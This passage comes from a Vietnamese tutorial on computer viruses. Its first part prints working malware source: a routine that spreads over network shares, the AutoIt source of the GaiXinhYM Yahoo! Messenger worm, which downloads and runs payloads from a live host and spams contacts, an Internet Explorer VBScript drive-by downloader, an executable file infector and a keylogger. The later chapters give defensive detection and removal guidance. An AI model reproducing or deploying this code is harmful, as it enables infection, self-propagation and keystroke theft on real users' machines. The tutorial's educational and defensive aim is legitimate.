Dim AppVirus As String‘Xác định đường dẫn virusIf Len(App.Path) <> 3 Then AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))Else AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))End IfDim ishellSet ishell = CreateObject("wscript.shell")ishell.run "%comspec% /C net view > C:\plog.tmp", 0, TrueSet fso = CreateObject("scripting.filesystemobject")Set rd = fso.opentextfile("C:\plog.tmp")nbuff = 0Do While rd.AtEndOfStream <> Truenbuff = rd.readlineIf Left(nbuff, 2) = "\\" Then‘Chạy một lệnh trong hệ thống nhầm liệt kê các tài nguyên cia sẽ hiện tại rồi sau đó ghi thông tin ấy vào “C:\clog.tmp” ishell.run "%comspec% /C net view " & Trim(Left(nbuff, 21)) & " > C:\clog.tmp", 0, True                    Set rdd = fso.opentextfile("C:\clog.tmp")               buff = ""            Do While rdd.AtEndOfStream <> True          buff = rdd.readline        combuff = Right(Trim(buff), 4)      If Right(combuff, 4) = "Disk" Then    buffadd = Left(buff, 13)If Len(Trim(buffadd)) > 0 Thensharename = a & Trim(Left(nbuff, 21)) & "\" & Trim(buffadd) & a‘Sao chép virus lên thư mục đang được chia sẻFileCopy AppVirus, sharename & "\" & appl & ".exe"End IfEnd IfLoopEnd IfLoop

4. Qua các dịch vụ IM

Sau đây là một số khái niệm chính về IM

Nhắn tin nhanh (hay tin nhắn tức khắc, trò chuyện trực tuyến, chát - từ chat trong tiếng Anh, IM viết tắt của Instant Messaging), là dịch vụ cho phép hai người trở lên nói chuyện trực tuyến với nhau qua một mạng máy tính.

Page 14: Tong Quan Virus

Mới hơn IRC, nhắn tin nhanh là trò chuyện mạng, phương pháp nói chuyện phổ biến hiện nay. Nhắn tin nhanh dễ dùng hơn IRC, và có nhiều tính năng hay, như khả năng trò chuyện nhóm, dùng biểu tượng xúc cảm, truyền tập tin, tìm dịch vụ và cấu hình dễ dàng bản liệt kê bạn bè.Nhắn tin nhanh đã thúc đẩy sự phát triển của Internet trong đầu thập niên 2000.

Giao thức - phần mềmCó nhiều cách để thực hiện nhắn tin nhanh, thông qua các dịch vụ như IRC, hay các dịch vụ của Yahoo!, Microsoft, do nhắn tin nhanh hỗ trợ rất nhiều giao thức khác nhau. Một số người dùng bị giới hạn vì sử dụng ứng dụng khách chỉ truy cập một giao thức/mạng IM, như MSN hay Yahoo!.

Một giao thức phổ biến đó là giao thức XMPP (Jabber). Đây là giao thức mở, an toàn, và máy chủ nào hỗ trợ giao thức này đều có thể kết nối được với nhau. Ứng dụng khách Jabber có khả năng truy cập mọi giao thức/mạng IM: MSN Messenger, Yahoo!, AIM, ICQ, Gadu-Gadu, ngay cả IRC và SMS. Chỉ một chương trình Jabber có thể nói chuyện với bạn bè trên mọi mạng.

Có một số ứng dụng khách Jabber là phần mềm tự do đa nền tảng và đã dịch sang tiếng Việt Psi, Gaim và JWChat. Cũng có Gossip dành cho hệ điều hành Linux/UNIX.

Ứng dụng nhắn tin nhanh có khả năng VoIP, nói chuyện trực tiếp qua máy tính, như điện thoại.

Ở Việt Nam dịch vụ IM thông dụng nhất là dịch vụ của Yahoo!. Ở Việt Nam cũng đã có những dịch vụ IM của riêng mình đó là VNN Messenger hay Zing (Tuy nhiên Zing Chat là một hệ thống IM được Việt Hoá).Trước đây, đã có nhiều virus lây lan bằng các dịch vụ nhắn tin (Chủ yếu là sử dụng IRC, MSN hay Spyke) nhưng dạo này người dùng Việt Nam mới để ý đến chúng do cơn “dịch” virus nội lây qua dịch vụ IM của Yahoo! mà khởi đầu là virus GaiXinhYM.Cơn “dịch” này bắt đầu từ năm 2006 vả đến nay thì vẫn chưa hoàn toàn kết thúc. Hàng trăm virus nội xuất hiện có cùng hình thức lây nhiễm qua dịch vụ nhắn tin này.

Tuy nhiên thao tác cơ bản khi chúng hoạt động thường chỉ gồm các thao tác sau :

1. Bạn nhiễm chúng ta sao ?Bạn đang chat, hay đọc tin nhắn Offline. Bạn đọc 1 tin nhắn từ bạn của bạn, chứa một đường dẫn nhìn vào “rất bình thường”. Bạn ấn chuột vào link ấy.Sau đó trình duyệt web hiện lên và mở liên kết ấy và bạn nhiễm virus. Còn vấn đề tại sao virus lại “chui” thành công vào máy tính của bạn thì bạn có thể đọc phần phương pháp lây truyền ngay khi bạn truy cập trang web nào đó.2. Tạo khoá khởi độngVirus đang chạy sẽ ghi thông tin để khởi động vào lần khởi động máy sau (Bạn có thể xem lại ở phần Tạo khoá khởi động ).3. Lây nhiễmCứ sau một khoảng thời gian nhất định (Có thể là vài phút, hoạt vài giờ). Virus xác định xem vào lúc ấy người dùng có đang dùng Yahoo Messenger hay không.Nếu có virus sẽ tự động giả lập liên tiếp nhiều sự kiện nhấn phím theo những phím nóng để thực hiện một chức năng nhất định trên Yahoo Messenger.Sau hàng loạt thao tác như vậy, thì kết quả là virus sẽ gửi 1 thông điệp mà virus quy định đến các nick trong danh sách bạn (Friend List) của bạn.Trong thông điệp này lại chứa những thông điệp và liên kết để khi người kia kích hoạt nó thì lại bị nhiễm. Chu trình cứ thế mà tiếp tục.4. Một số thao tác khác Không phải bất kỳ virus lây qua IM nào cũng giống nhau, sau đây là một số thao tác khác của chúng :- Tìm cách kiểm tra cập nhật phiên bản mới.

Page 15: Tong Quan Virus

- Tải thêm 1 virus khác.- Lây theo các hình thức khác (Qua USB, đĩa mềm…)

Sau đây là đoạn code của 1 virus lây qua mạng IM của Yahoo! viết trên AutoIt (Mã nguồn virus GaiXinhYM).

; <AUT2EXE VERSION: 3.1.1.112>

; ----------------------------------------------------------------------------; <AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>; ----------------------------------------------------------------------------

; ----------------------------------------------------------------------------;; AutoIt Version: 3.1.0; Author: A.N.Other <[email protected]>;; Script Function:; Template AutoIt script.;; ----------------------------------------------------------------------------

; Script Start - Add your code below here

$version = "1.0"

AutoItSetOption ("TrayIconHide","1")InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)sleep(3000)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir & "\Messenger.exe")

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)sleep(5000)$checkfile = FileExists ( @WindowsDir & "\Version.txt" )if $checkfile = 1 then$file = FileOpen (@WindowsDir & "\Version.txt",0 )$read = FileRead($file,3)FileClose($file)if $read <> $version thenInetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)sleep (3000)Run(@WindowsDir & "\Update.exe")endifendif

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")

Page 16: Tong Quan Virus

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")AutoItSetOption ("WinTitleMatchMode", "2")$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )if $check = 1 thenFileMove(@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ,@WindowsDir &"\msconfig.exe" )FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")endif

;;Doan na`y xoa di de doan ma khong bi loi dung;; xLuke

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then$title = WinGetTitle("Yahoo! Messenger")$wincheck = WinExists ($title)ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?file=Gaixinh.jpg</a>")if $wincheck = 1 thenBlockInput (1)WinActivate($title)send("!A")send("M")sleep(400)send("{DOWN}")send("{SHIFTDOWN}")send("{DOWN 70}")send("{enter}")send("{LSHIFT}")send("^v {ENTER}")BlockInput (0)endifendif

Next

; -----------------------------------------------------------------------; <AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>; -----------------------------------------------------------------------

Phân tích các công việc mà virus thực hiện :- Ghi khóa khởi động- Tự động kiểm tra phiên bản, nếu có phiên bản mới hơn sẽ tự động tải bản đó về- Sau một khoảng thời gian nhất định sẽ kiểm tra xem Yahoo Messenger có làm việc hay không, nếu có sẽ tiến hành giả lập liên tiếp nhiều phím nóng để thực hiện việc gửi một thông điệp có chứa liên kết chứa mã độc (Nếu trình duyệt trên máy người truy cập trang web ấy vẫn còn cho chạy VBScript thì người dùng ấy sẽ bị nhiễm virus).5. WEB

Page 17: Tong Quan Virus

Bạn mới chỉ truy cập vào 1 trang web lạ. Bỗng nhiên bạn nhiễm virus. Nó làm bạn máy tính bạn lộn xộn cả lên. Lúc này bạn vẫn không hiểu tại sao virus nhiễm vào máy bạn. Phân này sẽ giúp bạn làm sáng tỏ điều này.

Thuở sơ khai, Internet chưa có hình ảnh, hoạt hoạ tươi đẹp như hôm nay. Do nhu cầu trình diễn và nhiều ứng dụng trên trang web ngày càng mạnh, người ta đã xây dựng nên các công cụ để phục vụ mục đích ấy. ActiveX hay các script xuất hiện vì các lý do ấy.Tuy nhiên, những công cụ này cũng tạo ra những lỗ hổng bảo mật nguy hiểm.Các virus Việt Nam đã sử dụng 1 lỗ hổng về mã VBScript của trình duyệt Internet Explorer (Một trình duyệt web phổ biến ở Việt Nam) để lây nhiễm.

Sau đây là đoạn mã VBScript thực hiện việc cài virus vào máy người truy cập trang web :<script language="VBScript">on error resume nextdl = "Link virus"Set df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Set x = df.CreateObject(str,"")a1="Ado"a2="db."a3="Str"a4="eam"str1=a1&a2&a3&a4str5=str1set S = df.createobject(str5,"")S.type = 1str6="GET"x.Open str6, dl, Falsex.Sendfname1="Tên lưu trong máy"set F = df.createobject("Scripting.FileSystemObject","")set tmp = F.GetSpecialFolder(2)fname1= F.BuildPath(tmp,fname1)S.openS.write x.responseBodyS.savetofile fname1,2S.closeset Q = df.createobject("Shell.Application","")Q.ShellExecute fname1,"","","open",0</script>

Trong đó :Link virus : Là đường dẫn nơi lưu trư virus.Tên lưu trong máy : Là tên bản sẽ được lưu trong máy tính nạn nhân. Nếu ở đây chỉ có tên thì mặc định virus sẽ được lưu vào thư mục hệ thống.

6. Qua fileĐây là cách lây nhiễm virus đã tồn tại rất lâu. Cách thức lây nhiễm cơ bản là virus sẽ thay đổi nội dung file của bạn mà sau đó khi bạn hay người khác làm việc với file ấy thì bạn sẽ nhiễm phải virus.Trước đây, phần lớn virus file chỉ tìm cách lây nhiễm vào các file định dạng exe, pif, com, bat… và virus Macro thay đổi cấu trúc các file văn bản (.doc của Word và .xls của Excel). Nhưng theo tôi nhận thấy, gần đây đã có một số virus nhiễm vào file thông minh hơn.Các virus marco hiện nay đã gần như hết đất sống, khi các công cụ diệt virus và của chính hãng cung cấp phần mềm soạn thảo văn bản ngày càng chú ý đến dạng virus này.Tuy nhiên, theo tôi nhận thấy, gần đây một số virus đã rất thông minh khi vẫn lây nhiễm vào các định dạng doc và xls mà không cần sử dụng đến marco.

Page 18: Tong Quan Virus

Một ví dụ cụ thể là virus Ukuran. Đây là virus phá hoại dữ liệu các file .DBF, .LDF, .MDF, .BAK và thay đổi các file .doc và .xls . Virus thực tế đã không thay đổi cấu trúc file gốc mà đã xoá file ấy đi và tạo 1 file mới cùng tên với file văn bản ấy với phần mở rộng là “.exe” . Trong file mới này, virus đã chèn chính mình ở phía trên và phần dữ liệu của file văn bản ở phía cuối file. Khi được kích hoạt, chúng sẽ tách dữ liệu của file văn bản ở cuối file để tạo thành 1 file mới và cho người dùng làm việc trên file này.Lúc này, file virus tạo là file thực thi chứ không phải là 1 file văn bản như ban đầu. Kẻ viết virus đã rất thông minh khi để biểu tượng (Icon) của virus chính là biểu tượng của các file văn bản tương ứng. Điều này làm người dùng nhầm lẫn file này chính là file văn bản mà vô tình kích hoạt và nhiễm virus

Sau đây là đoạn mã của virus chèn dữ liệu của mình vào phái trên của các file .exe :

Option ExplicitPrivate victim As StringPrivate myarray() As BytePrivate varray As BytePrivate length As LongPrivate chck As String

Const size As Integer = 18432 ’18432 là dung lượng virus sau khi biên dịchPrivate iResult As LongPrivate hProg As LongPrivate idProg As LongPrivate iExit As LongConst STILL_ACTIVE As Long = &H103Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Declare Function OpenProcess Lib "kernel32" _(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _ByVal dwProcessId As Long) As LongPrivate Declare Function GetExitCodeProcess Lib "kernel32" _(ByVal hProcess As Long, lpExitCode As Long) As LongPrivate Declare Function CloseHandle Lib "kernel32" _(ByVal hObject As Long) As Long

Private Sub Form_Load()

On Error Resume Next

Dim I As LongDim FreeFree = FreeFile

On Error GoTo Fin ‘Lưu toàn bộ dữ liệu của virus vào một biếnOpen App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Freemyarray = Space$(size)Get #1, 1, myarray

Close #Free

‘Bắt đầu thực hiện việc liệt kê các file .exe tồn tại trong cùng thư mục đang chứa virusvictim = Dir(App.Path & "\" & "*.EXE")

Page 19: Tong Quan Virus

While victim <> ""

If LCase(App.Path & "\" & App.EXEName & ".exe") _<> LCase(App.Path & "\" & App.EXEName & ".exe") Then

‘Lưu dữ liệu file sẽ bị lây nhiễm vào 1 biếnOpen Victim For Binary Access Read As #Freevarray = Space(LOF(Free)) Get #1, 1, varray Close #Free

chck = Mid(varray, Len(varray)) ‘Kiểm tra ký tự cuối cùng của file (Nếu là “^”là đã bị nhiễm)

If LCase(chck) <> "^" Then

Open victim For Binary Access Write As #FreePut #Free, 1, myarray Put #Free, size, varray Put #Free, LOF(Free) + 1, "^" Close #Free

End IfElseEnd If

Victim = Dir()Wend

‘Lấy toàn bộ dữ liệu của file hiện tại (Trừ đi dung lượng của virus)Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Freelength = (LOF(Free) - size) If Length > 0 Then myarray = Space(length) Get #Free, size, myarray Close #Free

‘Đặt dữ liệu ban đầu (Dữ liệu khi chưa bị nhiễm virus) vào 1 fileOpen App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #FreePut #Free, , myarray Close #Free

‘Chay file sạch (File ban đầu trước khi bị lây nhiễm)idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) ‘Lấy mã số chương trình đang chạyGetExitCodeProcess hProg, iExit

Do While iExit = STILL_ACTIVE ‘Chờ đợi cho đến khi chương trình kết thúc DoEventsGetExitCodeProcess hProg, iExitLoopOn Error Resume NextKill App.Path & "\" & App.EXEName & ".tut"‘Xóa file

Else

Page 20: Tong Quan Virus

Close #FreeEnd IfEndFin:End Sub

Một số hoạt động phá hoại khácKeylog Ghi lại chuỗi phím gõ của người dùng. Nó có thể hữu ích cho việc tìm nguồn gốc lỗi sai trong các hệ thống máy tính và đôi khi được dùng để đo năng suất làm việc của nhân viên văn phòng. Các phần mềm kiểu này rất hữu dụng cho ngành luật pháp và tình báo - ví dụ, cung cấp một phương tiện để lấy mật khẩu hoặc các khóa mật mã và nhờ đó qua mắt được các thiết bị an ninh. Tuy nhiên, các phần mềm keylogger được phổ biến rộng rãi trên Internet và bất cứ ai cũng có thể sử dụng cho mục đích lấy trộm mật khẩu và chìa khóa mã hóa.

Sau đây là đoạn mã KeyLog căn bản :Trong Module :Public Const DT_CENTER = &H1Public Const DT_WORDBREAK = &H10Type RECT Left As Long Top As Long Right As Long Bottom As LongEnd TypeDeclare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As Long, ByVal lpsz As String, ByVal n As Long, lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As LongDeclare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As LongDeclare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As LongDeclare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As IntegerDeclare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As LongGlobal Cnt As Long, sSave As String, sOld As String, Ret As StringDim Tel As LongFunction GetPressedKey() As String For Cnt = 32 To 128 If GetAsyncKeyState(Cnt) <> 0 Then GetPressedKey = Chr$(Cnt) Exit For End If Next CntEnd FunctionSub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) Ret = GetPressedKey If Ret <> sOld Then sOld = Ret sSave = sSave + sOld End IfEnd SubTrong Form :Private Sub Form_Load()

Page 21: Tong Quan Virus

Me.Caption = "Key Spy" SetTimer Me.hwnd, 0, 1, AddressOf TimerProcEnd SubPrivate Sub Form_Paint() Dim R As RECT Const mStr = "Nao bat dau go di khi ban an dau X de thoat ban se thay bat ngo thu vi day." Me.Cls Me.ScaleMode = vbPixels SetRect R, 0, 0, Me.ScaleWidth, Me.ScaleHeight DrawTextEx Me.hDC, mStr, Len(mStr), R, DT_WORDBREAK Or DT_CENTER, ByVal 0&End SubPrivate Sub Form_Resize() Form_PaintEnd SubPrivate Sub Form_Unload(Cancel As Integer) KillTimer Me.hwnd, 0 MsgBox sSaveEnd Sub

BackDoor (Cửa hậu)Cửa hậu là một phương pháp vượt qua thủ tục chứng thực người dùng thông thường hoặc để giữ đường truy nhập từ xa tới một máy tính, trong khi cố gắng không bị phát hiện bởi việc giám sát thông thường. Cửa hậu có thể có hình thức một chương trình được cài đặt, hoặc có thể là một sửa đổi đối với một chương trình hợp pháp - đó là khi nó đi kèm với Trojan. Kỹ thuật này dựa vào sự kết nối giữa 2 máy tính với nhau (Với các ngôn ngữ bậc cáo chúng ta có thể sử dụng control WinSock để thực hiện việc này dễ dàng).

Tống tiềnMột số loại phần mềm ác tính sử dụng một hệ thống mật mã hóa yếu (phá được) để mã hóa dữ liệu thuộc về một cá nhân và đòi tiền chuộc thì mới khôi phục lại.Phương thức thanh toán của kẻ điều khiển các loại virus này thường rất thông minh (Có một vài kẻ bắt buộc người dùng phải mua một số món hang nhất định trên một đĩa chỉ nào đó mà kẻ điều khiển quy định).

BotNetLà một mạng lưới gồm nhiều máy tính đã bị nhiễm virus (Thường là worm, trojan) và bị điều khiển từ xa. Các BotNet thường được kẻ điều khiển sử dụng để tấn công từ chối dịch vụ (DDos) hay gửi thư rác (Spam) nhầm kiếm lợi cho mình.

RootkitLà bộ công cụ phần mềm che giấu sự tồn tại file nhưng thực ra nó vẫn hoạt động. Rootkit thường được bên thứ ba (thường là kẻ xâm nhập) dùng sau khi chiếm được quyền truy cập vào hệ thống máy tính. Các công cụ này thường nhằm để che dấu dữ liệu hệ thống, tập tin hoặc tiến trình đang chạy, từ đó giúp cho kẻ xâm nhập duy trì quyền truy cập vào hệ thống mà người dùng không biết. Rootkit có ở nhiều loại hệ điều hành như Linux, Solaris và các phiên bản Microsoft Windows.

Chương 3 : Nhận dạng và tiêu diệt

I. Làm sao để nhận dạng virus ?Theo nhiều tài liệu thì khi có một số dấu hiệu bất ổn như CPU phải làm việc liên tục ngay cả khi bạn không làm gì, máy tính chạy chậm lại, khởi động một ứng dụng nào đó chậm, máy tính khởi động chậm... thì đều có thể nghi ngờ là tồn tại virus trong máy.Tuy nhiên, theo tôi quan dù quan điểm trên là không sai, nhưng với các máy tính hiện nay thường cài rất nhiều ứng dụng. Một số chúng không phải khi nào cũng hoạt động mà đôi

Page 22: Tong Quan Virus

lúc khi thỏa một số điều kiện nào đó thì chúng mới thực sự làm việc. Điều này làm cho máy tính bạn không phải lúc nào cũng ổn định. Khởi động chậm có thể do nhiều tác nhân như số chương trình khởi động quá nhiều, do một chương trình nào đó ngay khi khởi động đã làm việc ngốn nhiều bộ nhớ, khởi động một ứng dụng nào đó chậm có thể do trong lúc đó một chương trình khác đang sử dụng nhiều tài nguyên hệ thống...Vì vậy chúng ta cần có cách nghĩ khác về vấn đề này. Theo cá nhân tôi, những dấu hiệu bất ổn ở một máy tính bình thường sẽ là :- Bị khóa Regedit, Task Manager, MSConfig.- Có những tiếng trình và những chương trình khởi động cùng hệ thống lạ.- Sự xuất hiện chức năng Autorun trên USB.- Các chương trình (Có phần mở rộng .exe , .scr) có icon giống hình thư mục.- Các chương trình có tên gần giống, hoặc giống như khác thư mục lưu trữ với một số chương trình hệ thống.- Đang chat thì tự nhiên phần mềm chúng ta đang chat ấy gửi những thông điệp lung tung trong khi bạn không thực hiện.

Trong những phần tiếp theo, chúng ta sẽ dựa vào các yếu tố trên để diệt các loại virus. Tuy nhiên, việc nhận dạng và tiêu diệt virus chủ yếu dựa vào kinh nghiệm nên những hướng dẫn sau đây sẽ không đi vào nói rõ làm sao để biết chúng là virus? Mà chỉ hướng dẫn các thao tác cần thiết để diệt virus.II. Dừng hoạt động của virusKhái niệm về tiến trình (Process)Trong khoa học máy tính, tiến trình là một thực thể điều khiển đoạn mã lệnh có riêng một không gian địa chỉ, có ngăn xếp (stack) riêng rẽ, có bảng chứa các số miêu tả file (file descriptor) dược mở cùng tiến trình và đặc biệt là có một định danh PID (process identifier) duy nhất trong toàn bộ hệ thống vào thời điểm tiến trình đang chạy.Dừng hoạt động của virusĐể nhận dạng và diệt virus thì thao tác cơ bản là phải nhân ra tiến trình virus đang làm việc và diệt các tiến trình này.Công cụ cơ bản của Windows để quản lý các tiến trình là Task Manager (Nhấn tổ hợp phím Ctrl+Alt+Delele rồi chọn thẻ Processes). Tuy nhiên công cụ này không thật hiệu quả.Công cụ mà tôi sử dụng chủ yếu để quản lý tiến trình là ProcessXP.Để tiêu diệt một tiến trình đang chạy trong ProcessXP bạn chọn vào tiến trình ấy rồi bấm Delete hoặc chuột phải rồi chọn Kill process.Khi bạn nghi ngờ máy tính mình đã nhiễm virus, bạn tiêu diệt hết các tiến trình của các ứng dụng mình đang chạy. Tuy nhiên có một số process bạn không nên tiêu diệt, đó là những tiến trình của hệ thống. Cụ thể trong máy tôi thì những tiến trình được đóng khung sau là những tiến trình của hệ thống.

Page 23: Tong Quan Virus

III. Quản lý các chương trình khởi động của hệ thốngVirus khởi động như thế nàoThông thường các virus sẽ khởi động vào các các như đã nói ở phần trên. Một số không nhiều virus chỉ bắt đầu khởi động khi bạn mở một ổ đĩa nào đó. Trong phần này tôi sẽ đề cập đến cách ngắt các chương trình khởi động theo các cách đã tổng kết ở phần trên.Trong việc nhận dạng và tiêu diệt thì phần quản lý các chương trình khởi động của hệ thống chiếm vị trí quan trọng hang đầu.

Nhận dạng RootkitRất khó nhận ra máy tính nào đó có bị nhiễm Rootkit hay không. Trong phần này tôi sẽ giới thiệu một số phần mềm nhận dạng và tiêu diệt Rootkit và cả địa chỉ tải chúng.F-Secure BlackLight Là chương trình được giới hạn thời gian, có thể sớm tạm ngừng để chuyển sang F-Secure Internet Security 2006. BlackLight có chế độ quét tỉ mỉ và làm sạch được nhiều file xâm phạm trên hệ thống.Download : http://www.f-secure.com IceSword 1.22Nhận dạng Rootkit nhanh chóng và dễ dàng tiêu diệt chúng. Không chỉ vậy, IceSword còn hỗ trợ một số tính năng khác như: Hiệu chỉnh registry, quản lý file, quản lý kết nối...Download : http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip RKDetector 2.0 Gồm hai ứng dụng riêng quét hệ thống file và các chương trình chạy tách biệt. RKDetector không có khả năng linh hoạt và nhiều thành phần như các chương trình khác.Download : http://www.rkdetector.com Trend Micro RootkitBuster 1.6 Phiên bản độc lập, "khuyến mãi" của công nghệ quét rootkit tách ra từ sản phẩm thương mại của Trend Micro. Hoạt động thực sự khá hiệu quả.Download : http://www.trendmicro.com RootkitRevealer 1.71 Một trong những công cụ dò tìm rootkit đầu tiên, bây giờ bị lu mờ bởi nhiều chương trình

Page 24: Tong Quan Virus

khác tốt hơn, nhưng vẫn còn hoạt động tương đối ổn.Download : www.microsoft.com/technet/sysinternals/utilities/RootkitRevealer.mspx GEMR Một công cụ nhận dạng và tiêu diệt Rootkit khá mạnh, ngoài ra còn cung cấp công cụ để quản lý registry, quản lý file, quản lý các chương trình dịch vụ (Services), một công cụ nhỏ để thay thế cửa sổ CMD của hệ điều hành và cả công cụ để chạy các dòng lệnh (Trên VBS) nhằm sửa chữa Registry.Download : http://www.gmer.net/gmer.zip

Do tính chất của mình, các công cụ nhận dạng và diệt RootKit trên đây không cần cahỵ thường trực mà chỉ làm việc khi bạn sử dụng nó. Vì vậy bạn nên tải nhiều công cụ trong máy mình để khi cần thiết sẽ sử dụng nhiều công cụ khác nhau để tiến hành quét hệ thống để sự an toàn được cao hơn.

Quản lý các chương trình khởi động của hệ thốngWindows có sẵn một công cụ để quản lý các chương trình khởi đông cùng hệ điều hành là MSConfig (Bạn chọn Start -> Run... -> Nhập vào msconfig rồi chọn OK, sau đó bạn chọn thẻ Startup để quản lý các chương trình thông thường hoặc Services để quản lý các chương trình dịch vụ.)Tuy nhiên, cũng như phần mềm Task Manager có sẵn. MSConfig chưa phải là sự lựa chọn tốt. Tôi dùng Autoruns để làm việc này.Bạn có thể dễ dàng ngắt khóa khởi động của một chương trình bằng cách bỏ dấu chọn ở khóa đó hoặc chọn khóa đó rồi ấn Delete.Tuy nhiên, có một số địa chỉ tuyệt đối bạn không được ngắt. Lý do vì sao thì bạn có thể xem lại phần nói về các khóa khởi động ở phần trên cuốn sách.

Các key chứa giá trị đường dẫn sẽ được khởi động ngay cả SafeMode (Và cả chế độ làm việc thông thường) là :HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserinitHKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Trong Autoruns bạn sẽ dễ dàng nhận ra 2 key này. Các giá trị mặc định của máy tính thông thường là (Nếu đĩa C là phân vùng chứa hệ điều hành)Với key Userinit : C:\Windows\system32\userinit.exeVới key Shell : C:\Windows\Explorer.exeNếu máy tính bạn có những giá trị khác tức là máy tính bạn có “Vấn đề”. Bạn hãy nhập lại các giá trị trên vào các key (Bạn có thể mở Registry bằng cách chọn Run, nhập regedit và ấn Ok). Hoặc bạn có thể dùng bất kỳ phần mềm nào khác cho phép sửa chữa registry.Tuy nhiên bạn cần chú ý, khi bạn chỉnh sửa mà virus vẫn đang hoạt động thì nhiều khả năng sẽ không có tác dụng.

Page 25: Tong Quan Virus

Nếu bạn trong một lần khởi động nào đó mà máy không tìm thấy tập tin lưu trong 2 khóa này thì Windows sẽ tự động Log Out. Để xử lý vấn đề này, bạn có thể xem ở phần sau.

IV. Khôi phục hệ thốngDiệt virus chưa phải là tất cả, một số virus sẽ thay đổi và thậm chí phá hoại hệ thống của bạn. Vì vậy mà sau khi diệt xong virus, bạn bắt buộc phải kiểm tra lại hệ thống và kiểm tra lại một số thiết lập của hệ thống để máy tính có thể trở lại trạng thái trước khi nhiễm virus.Phục hồi các thư mục ẩnMột số virus có một kiểu hành vi phá hoại khá lạ lùng đó là cấu hình tất cả các thư mục trong máy tính chế độ ẩn (Hidden). Hoặc một số virus dùng icon giống hình thư mục, chúng thiết lập chế độ ẩn cho các thư mục và chúng giả thư mục ấy (Virus này cũng thiết lập lại hệ thống để bạn không nhìn thấy các thư mục hay tập tin ẩn khi dùng Windows Explorer hay một số trình quản lý file khác), người dùng tưởng rằng đó là thư mục bình thường (Như trước khi nhiễm virus) nên lại tiếp tục kích hoạt virus ấy.Việc nhận dạng virus và diệt virus dạng giả thư mục này đã nói ở phần dưới của cuốn tài liệu. Trong phần này chúng ta sẽ tìm cách phục hồi kiểu hiển thị ban đầu cho các thư mục kia.Có nhiều cách để bạn làm việc này :1. Cách làm thủ công là bạn phục hồi lại việc xem được các file ẩn bằng Windows Explorer rồi phục hồi bằng các thao tác : Nhấp chuột phải vào thư mục -> Chọn Properties -> Bỏ dấu chọn Hidden rồi bấm Apply.2. Dùng các phần mềm quan lý file có thể xem file hay tập tin ẩn và cho phép sửa đổi các thuộc tính của chúng như : Far Mannager, Total Commander, Norton Commander.

Tuy nhiên việc bạn thiết lập như vậy khá vất vả, để nhanh chóng hơn bạn có thể dùng phần mềm FixAttrb của Bkis để phục hồi lại thuộc tính cho các thư mục.Chương trình có giao diện đơn giản và khả năng phục hồi dữ liệu rất nhanh.Download : http://www.bkav.com.vn/home/Download/FixAttrb.exe

